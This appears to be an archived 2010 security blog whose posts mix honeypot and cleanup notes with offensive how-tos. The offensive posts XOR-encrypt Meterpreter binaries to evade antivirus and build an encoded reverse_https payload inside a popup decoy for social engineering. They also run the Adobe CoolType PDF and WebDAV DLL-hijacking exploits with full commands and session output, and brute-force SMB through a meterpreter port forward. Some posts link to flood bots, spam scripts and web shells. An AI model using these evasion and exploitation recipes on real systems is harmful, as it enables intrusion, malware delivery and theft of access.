We need to place now a breakpoint at retn instruction,

By doing that we are telling the debugger that when the program is going to be executed, the execution will stop at the retn function. We are doing this because all we need is for our xor function to start from the top of the actual code until the start of our code and xor every bit of data with the selected key, we don't want to run the program actually. After placing the breakpoint we hit run (or press F9) once

If we take a look at the code above we will see now that it's changed. Now we need to select the modified code and save it as a new file. So selection will start from our new OEP (0040BF60), until the first original OEP (00406D42) of the file.

Right click, select copy to executable, selection and again right click on the new window and save file with a new name.

Finally we have our new XORed file.

Using this simple technique only 2 antivirus engines were bypassed and no longer are detecting meterpreter as virus, the av engines that no longer recognize the binary file are VirusBuster and eTrust-Vet.

More results will follow with different methods of binary encryption/packing. A final for this test, the ollydbg may log an access violation during the XOR process, this is due to the fact that many times .text section of the PE file is market as executable and readable only. We need to change the flags on the section to writable as well. To achieve that loading the file in LordPE, from PE editor, sections, right click on the .text section, flags ... make sure the writable option is set.

Metasploit migrate and e-mail.

2010-10-06T14:28:00.000+03:00

Not all hacks happen instantly sometimes you have to wait. The problem is that you might have to wait for days especially when social engineering is taking part in the process.

Even if all things goes well and the attack succeed the payload is a meterpreter connect back shell that will take me to the magic world of new and exciting data. Some problems here, the binary in order to go undetected is encoded using a custom template ( a custom small application that will show a popup ) and this is problem A. This application will just run for some seconds and then it will close, closing meterpreter on the way and my connection. Another problem is that i don't know when the connection is going to take place, it might take place in a few days or even in a couple of weeks that will be problem B.

Problem A is solved easy using a migrate script to migrate into another process and preferably, explorer.exe will be of my taste. So the story on the metasploit console goes like this

./msfpayload windows/meterpreter/reverse_https LHOST=my_dynamic_dns_host LPORT=443 R |./msfencode -k -x ./popup.exe -c 3 -e x86/shikata_ga_nai -t exe -o popup_out.exe

will create a roughly undetected binary with meterpreter inside.

On meterpreter console now running under screen,
./msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST my_dynamic_dns_host
set LPORT 443
set AutoRunScript migrate explorer.exe
exploit -j

This will take care of problem A.

Moving on to problem B now.

By default metasploit doesn't provide us any method to inform the attacker for the process of the attack, if he is not looking at the console screen directly. To overcome this i made a small modification to the migrate.rb script located at scripts/ directory on the metasploit root directory. This small modification does the following, when the attack succeeds and migration is complete a mail will be send to a specific address to inform about the success.

meterpreter > run migrate notepad.exe
[*] Current server process: Explorer.EXE (3156)
[*] Migrating to notepad.exe...
[*] Migrating into process ID 5064
[*] New server process: notepad.exe (5064)
[*] Emailing myself@myhost

The modified migrate.rb can be found here : http://www.deventum.com/research/migrate.rb , if you use it don't forget to change the e-mail address :)

Intruder alert

2010-09-28T05:32:00.000+03:00

It's 4 o clock in the morning and the CISCO intrusion alert system is flash red "Possible security breach" in the big wall screen whilst alerting the sysadmins with voice mails and e-mails ... or maybe I'm still dreaming and this was part of a movie. Still there is an alert on my telephone laying down on the floor next to me with a message, "there must be something here". This is a default message that I've put in a series of bash scripts running under cron every now and then, to alert me for possible filesystem changes and files or directories created where they are not supposed to be.

I've been running some custom honeypots windows and linux for some time now in order to collect malware bots and other goodies, mostly for hobby.

This time the alert came from a linux system, that's running an old phpmyadmin package, it's the second time during a month that the system gets compromised, so there is a lot of activity in phpmyadmin scans both on linux and on windows systems.

Logging in the system immediately i checked the processes running, it's common on these attacks that the attacker will be hiding bot or backdoor with a fake process name. Most of the attackers are masking their backdoors or bots under httpd or apache process making it less obvious for the sysadmin to locate the binary in the first glance.

This time the binary was running under rpc.idmapd name
nobody 15550 0.0 3.1 44368 30928 ? S 04:11 0:06 rpc.idmapd

Easy to spot since the process didn't belong to this specific system configuration. Locating the location of the binary is easy using lsof command. lsof -p 15550 gave the where about of the binary and the open connections. Here most of the times I'm keeping a process dump for further analysis using pcat from tct ( http://www.porcupine.org/forensics/tct.html ) there are many good information that can be found in the active memory dump of the process, like connection strings, username and passwords etc.

This time the binary was, again, a mech bot ( http://www.energymech.net/ ) connecting to quakenet irc network, nothing interesting here :/ hope the attackers will be more creative next time.

Bot packed, http://www.deventum.com/research/15550.tar.gz

Phpmyadmin scans

2010-09-12T21:59:00.000+03:00

Sunday night and the weather is getting colder, kids asleep, a nice time to check on honeypot logs. Some days ago SANS reported a new at that time binary "dd_ssh" ( http://isc.sans.edu/diary.html?storyid=9370 ) and it related the attack on the phpMyAdmin vulnerability. Honeypot is grabbing some URLs also possibly related on the same attack vector.

GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1

There is one user agent that is appearing in the logs also " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ", the report on whithat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...

Adobe 0day cooltype and metasploit

2010-09-09T11:35:00.000+03:00

Once more metasploit is way ahead of competition, this time with a 0day for adobe pdf reader. Having some time today i thought i give it a try.

In a windows 7 vm, i got the latest pdf reader from adobe ( version 9.3.4 at the moment )

Now on the metasploit console,

root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >

msf exploit(adobe_cooltype_sing) > info

       Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
    Version: $Revision$
   Platform: Windows
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
Unknown
   <@sn0wfl0w>
   <@vicheck>
jduck

Available targets:
Id Name
-- ----
0   Automatic

Basic options:
Name        Current Setting                 Required Description
----        ---------------                 -------- -----------
FILENAME    msf.pdf                         yes       The file name.
OUTPUTPATH /home/root/trunk/data/exploits yes       The location of the file.

Payload information:
Space: 1000
Avoid: 1 characters

Description:
This module exploits a vulnerability in the Smart INdependent
Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
Adobe Reader. Prior version are assumed to be vulnerable as well.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >

Let's get the msf.pdf now and start a generic handler on the msfconsole.

msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

On the windows 7 now,

Clicking the msf icon,

No luck at the moment on windows 7, the application crashed with no session. Trying the same on windows XP the screen shows the following:

And on our server we have:

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010

meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter >

I hope it won't take long for the windows 7 version.

Infected website cleaning

2010-09-09T10:11:00.003+03:00

Having a lot of websites to monitor many times even in the ones most updated you might find backdoors or other goodies. A couple of days ago a client called and said that google was blocking through safe browsing his website, at least one of them, and another one was popping advertisements when visited. It came to my surprise that those sites were infected because i knew that they were updated recently and to my knowledge there was no vulnerability for the latest update.

Poking around a bit it didn't took long to realize that the infection was done through ftp and there was no sql injection or any other vulnerability in the code of the website.

Most of the time, my work finishes there i will tell the client to clean up the code and change the ftp password. In this case the client was also a good friend and i thought to give him a bit of help there.

The infected files where .php and .html files with the following code,

script src="hxxp://youngarea.ru/Vector.js" type="text/javascript"

grep gave the following result,

# grep -R youngarea *| wc
140 420 16869

140 files infected, cleaning them one by one could take some time.

Sed to the rescue !

The following command is looking at the current directory for files ending with php extension and is replacing the lines starting with < , containing youngarea and ending with > with nothing, thus cleaning up the infection.

find . -name "*.php" -type f | xargs sed -i 's/<.*youngarea.*>//g'

The same command was applied also for the files ending with .html

find . -name "*.html" -type f | xargs sed -i 's/<.*youngarea.*>//g'

and the website was clean in a couple of seconds.

Floodbots and more

2010-09-06T16:50:00.001+03:00

Another collection from the honeypot, floodbots and spam scripts. This one personally I have seen it a lot of times in different servers (sender, From: HSBC ) at /tmp directory under the name a/ and ". "

Spam sending scripts at http://www.deventum.com/research/spam.tar.gz , a poor 's man perl bot from TeaMrx team http://www.deventum.com/research/fetch.txt and finally an eggdrop with flood added modules capable for more than 50mbps flood traffic at http://www.deventum.com/research/floodbots2.tar.gz

DLL Hijacking and metasploit part 2

2010-08-24T15:19:00.000+03:00

Adding some more common applications that are vulnerable,

( windows live contact ) .contact
( Windows live mail ) .eml
( Opera ) .htm .html .mht .mhtml .xht .xhtm .xhtl
( Windows live mail ) .nws .rss
( Snagit ) .snag
( Snagit accessories ) .results
( Snagit profiles ) .snagprof
( Teamviewer ) .tvc .tvs
( Opera widgets ) .wgt

DLL Hijacking and metasploit

2010-08-24T11:50:00.000+03:00

Following the excellent post on exploiting DLL hijacking from hdm ( http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html) i made an initial list of file extensions that are exploitable under windows xp sp3 clean install.

Currently the list consist of only four extensions, except .exe files and they are the following:

( group management ) .grp
( Digital ID File ) .p7c
( vCards ) .vcf
( address book files) .wab

Creating an extension list from the above, and using metasploit, we have the following :

./msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "grp p7c vcf wab"
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*]
[*] Exploit links are now available at \\xxx.xxx.xxx.xxx\documents\
[*]
[*] Using URL: http://xxx.xxx.xxx.xxx:80/
[*] Server started.

Now at the windows xp system from internet explorer we browse to the site above and after awhile a folder with several documents having the specified extensions will appear. Clicking on any of them will cause the following on the metasploit console:

msf exploit(webdav_dll_hijacker) > [*] yyy.yyy.yyy.yyy:27383 GET => REDIRECT (/)
[*] yyy.yyy.yyy.yyy:27383 GET => DATA (/favicon.ico)
[*] yyy.yyy.yyy.yyy:27482 OPTIONS /
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/desktop.ini
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 404 (/documents/desktop.ini)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /documents/policy.p7c
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/wab32res.dll
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/rundll32.exe
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 404 (/documents/rundll32.exe)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /documents/rsaenh.dll
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] yyy.yyy.yyy.yyy:27652 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27656 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27656 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Top-Level Directory
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:27654) at Tue Aug 24 11:38:57 +0300 2010

And here we have a nice meterpreter session.

Next, installing programs on the target system to identify more products that are vulnerable.

Metasploit and Ncrack

2010-07-06T00:24:00.000+03:00

For some days now i'm working in a case for a client, a pentest project. The story goes like that, there is a server and the price is to get access to that server. The system is a running a control panel to allow clients easy configuration on their domains. As usual there is nothing given except the ip of the server and the papers to sign. From there you are on your own. So where to start.

Only with the IP i couldn't see much on the system just the default page and nothing else, portscan shows some ports open nothing to attack directly or with known vulnerabilities then it occurred to me, this panel by default, is replying on reverse DNS with the full list of the domains that is supporting. So a nslookup IP IP did the trick and i had a list of the domains on the system. I started slowly to browse around the domains looking for outdated applications and other details, one point of entry. It didn't take long to find a misconfigured application that allowed file upload. My first choice was to use the meterpreter from metasploit to initiate a reverse connection ( everything running through a php shell ), it didn't took me long to realize then that the system was firewalled in almost every port. Second choice ahead, meterpreter on reverse https port ! And that did the trick, i had connection.

Almost ready to close the case and write a report to the client, being confident and all, that it's just 2 lines from now to get full access on the system i typed on the console,
meterpreter > use priv
Loading extension priv...success.
meterpreter >

Followed by the getsystem command where i was greeted with the following not so happy for me message,
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 5
meterpreter >
I got the same or similar error message for all methods and even for the latest method, brand new shinny KiTrap0D that to my surprise it didn't work. Most of the time these servers are not often rebooted ( patched from windows updates ) in order to maintain high uptime on the websites that they are serving.

Not giving up yet, there is always the motto, "Brute force, when you are not succeeding, you are not using enough". The first option was to brute force on the ftp server for accounts, but i already know that this panel is not allowing the administrator account to login through the ftp, and this account is the only one that i want to find out. I could go for remote desktop brute force but then it will take time, the whole process is very slow on rdp,and then i came across a very good network cracker, ncrack if only i could use it on the system that has the 445 port firewalled...

And here comes again the metasploit,
meterpreter >
portfwd add -l 445 -p 445 -r IP
meterpreter >

The port 445 was forwarded to my system, free from the firewall at last. Time for ncrack to take place.
./ncrack -vv -U users.txt localhost:445

and after a few minutes, the first results
Discovered credentials on smb://127.0.0.1:445 'user1' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user2' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user3' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user4' 'abcdef123'

It took almost three hours and 20 minutes to find the administrator password, but finally i had it!

Fuzzers and fuzzing

2010-06-22T13:27:00.000+03:00

It's been a while now i was trying to time to test some fuzzers. Fuzzing as it is defined in Microsoft's SDL (Security Development Lifecycle):

"Fuzzing is a testing technique that can help find denial of service and security vulnerabilities in software. The principle of fuzzing is very simple: create invalid data, force an application to consume that malformed data, and then observe the application as it executes. If the application crashes, then a bug may have been found in the target application. By identifying this crash, you are able to quickly target potential problems in the underlying code and determine if changes are needed to fix the crash (and any related potential security issues) from affecting your users."

Microsoft is providing minifuzz for free (http://www.microsoft.com/downloads/details.aspx?displaylang=en&familyid=b2307ca4-638f-4641-9946-dc0a5abe8513) and was the first choice of the day.

After installing minifuzz and running it we get the following screen:

There are two options that we really have to insert here, the rest can stay on the default. The options that we need are, the process to fuzz and the location of the Template files. Template files are files that we will provide at the application in order to test it. These files are the normal input files that the application should accept. For my case i choose to try Easy RM to MP3 Converter an older version that it's known for the vulnerabilities ( http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ )

Here is the fuzzer working

Quotting again the SDL process from Microsoft,
Fuzzing, as an SDL requirement, requires a minimum of 100,000 malformed files per file parser. So if your application parses three discrete file formats, .FOO files and .BAR files, then you need to create and correctly parse (ie; not crash) 100,000 FOO files and 100,000 BAR files.

So be ready for long hours. In another post we will see other fuzzers with examples.

Flood bots and others

2010-06-03T15:30:00.000+03:00

Today i found a bot running in a client's server system. The bot is designed for flood mainly and as it state in its name "Enjoy FloodBot based on OverKill". The problem on the server was a website that had an sql injection point, from there the attackers were able to take control on the site and add files through the custom cms. The content of the bot consist mainly of executables to perform flood attacks.

Link for research follows.

Flood Bot

PE code injection part 3

2010-04-21T11:40:00.000+03:00

A very good post on http://www.x-n2o.com/clever-tricks-against-antiviruses/, clever tricks against antivirus. Inside the post there is a main topic, "No imports!". Even though it's not new concept it's very nice explained with code examples. The same is done from different commercial packers eg. Themida for a very long time now.

Windbg and malware

2010-04-20T09:36:00.000+03:00

From the presentation of Mark Russinovich on malware cleaning, he pointed out a very nice way to clear possible kernel patches ( malware with rootkit behavior ) that are hijacking the system.

From the help file,

The !chkimg extension detects corruption in the images of executable files by comparing them to the copy on a symbol store or other file repository.

Using the command in the debugger with the following form we can observe the patches, or mismatched areas according to the symbols:
lkd> !chkimg -d nt
and clearing the patches from the system can be done easily with the following command:
lkd> !chkimg -f nt

More to come

PE code injection part 2

2010-04-16T12:48:00.000+03:00

Looking for code injection and trying to add sections on PE, i found a very nice work done by KOrUPt ( http://korupt.co.uk/?cat=6 ) he has already implement a very nice injector that you can download with the source code at http://korupt.co.uk/KInfect2.rar the only piece missing is a custom stub. His improved version is the kcrypter2 available in forums.

PE code injection

2010-04-09T11:51:00.000+03:00

Trying for awhile now to achieve 0 detection from antivirus engines, i believe the only solution is to move to manual encryption of the exe file or use a commercial cryptor. The problem with most packers/cryptors/protectors is that they are already considered as suspicious from the avs and many of them have requirements on the code.

Muts in 2008 made a nice presentation with the title Bypassing Anti-virus in Windows Vista, or "Piss on your AV" ( http://www.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html ). The presentation is nice, but not detailed. Some things are omitted,and other things not explained in details. Muts is using the last section of the PE header to add his stub, this is very convenient since the last section is the only one that can be easily extended without affecting other sections. But this is not the case always. Many times you cannot extend the last section and what you really need is to add a section or extend one section in the middle of the PE header. This will be in the next post, going for 0 detection.

php shell scripts

2010-03-31T10:38:00.000+03:00

I found today an interesting collection of php shellscripts feel free to give it a check if interested. There is also a nice collection from DK at http://michaeldaw.org/projects/web-backdoor-compilation.

Names,
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php

Some are modified versions of c99.php some seem custom.
Link to download here.